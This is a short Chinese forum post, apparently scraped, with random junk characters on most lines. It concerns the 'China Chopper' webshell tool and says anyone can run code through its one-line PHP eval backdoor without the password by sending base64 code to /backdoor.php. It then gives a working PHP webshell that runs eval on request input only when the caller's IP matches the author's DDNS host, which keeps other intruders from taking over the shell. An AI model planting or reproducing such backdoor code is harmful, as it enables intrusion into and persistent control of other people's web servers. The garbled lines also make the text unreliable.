今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞2 a0 `( p. | @; @! x# \0 u9 B
9 d/ H8 M. w8 ]" z
就算你设置了密码,使用了eval($_REQUEST['moyo']);+ }. Z, w5 I [
0 S$ r9 h3 R" g, a7 y但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门) F) U6 s1 J( Y6 \$ a& I
5 t# E1 D @2 @) H- y3 ^
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));* Z& F$ J% V' C5 S2 `
5 X0 K1 l" \$ L4 N0 v7 ]& N5 r
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
1 Q/ r$ z0 {6 ]& [0 N8 N, f$ |- F% R* S; [- T7 v
不知道是设计缺陷还是故意留的后门# G" t7 Z$ n Q: k. }; J# {0 ~. l/ _
$ s- I$ l* K! I6 L' \6 ^7 W
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
6 S: f9 g. Y/ m, w4 G0 P% i4 `) q4 t8 a# c
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org+ z5 f! g# \6 z. E9 f
- ?' _2 ?2 S* b5 o- g. s1 _' c
然后一句话后门这样写
5 G: i( }3 r+ f
7 r! ~' j8 y% o<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>0 s; E! a+ L, r: a! }
这样就可以让一句话后门只允许自己的电脑连接了
& D; _5 N$ _* B ^( Y
1 b+ [' n" I0 {. T0 B* q: b" y |